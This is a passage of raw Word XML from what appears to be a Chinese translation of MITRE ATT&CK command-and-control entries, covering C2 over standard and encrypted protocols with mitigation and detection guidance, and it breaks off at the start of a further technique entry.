        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）进行通信，将他们</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的通信</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据与现有通信数据混合，从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>规避</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测。远程系统的命令（通常是这些命令的结果）将嵌入到客户端和服务器之间的协议数据中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8A67D" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>飞地内连接（例如，代理或枢纽节点与其他节点之间的连接）的常用协议为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7D337" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00BC3074" w14:paraId="2CE3A076" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="27CEBB99" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="40FFB586" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="67739871" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338F8CFC" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId243" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25206947" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58AC041C" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2696F0" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87FD57" w14:textId="54D55BE0" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EAD9F" w14:textId="1920C245" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>标准加密协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="32A7C3B6" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C781F4" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1032</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD15BA3" w14:textId="61EE10C3" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B54891" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AADC009" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>软件反向工程</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络进程使用，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ACFF8D" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D47560" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690BDCCE" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0722B3D0" w14:textId="4DCD5F45" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会明确采用已知的加密算法来隐藏</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量，而不是依赖于通信协议自己提供的任何保护。尽管使用了安全算法，但是如果在恶意软件样本</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件中对必要的秘密密钥进行了编码和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或生成，则这些实现可能容易受到逆向工程的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958F865" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2406"/>
        <w:gridCol w:w="7330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00BC3074" w14:paraId="42E84B79" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="453E1F9F" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B4FE3EF" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="54BDEEF4" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A44057" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId244" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C452C37" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="54CB8AF1" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1584F098" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId245" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>SSL/TLS</w:t>
              </w:r>
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>检查</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280EA48D" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查来查看加密会话的内容，从而查找恶意软件通信协议的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>指示</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F9E1199" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E15F074" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB64BC2" w14:textId="7BE7A863" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是在某些加密通信通道中检测</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量的一种方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL /TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查的确带有某些风险。在实施之前应考虑这些风险来避免潜在的安全问题，例如不完整的证书验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E854577" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意软件使用对称密钥加密，则有可能从样本中获取算法和密钥来解码网络流量从而检测恶意软件的通信签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6C6F7" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总之，分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF794AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准非应用层协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="5EB380E8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="470F6599" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A054E0">
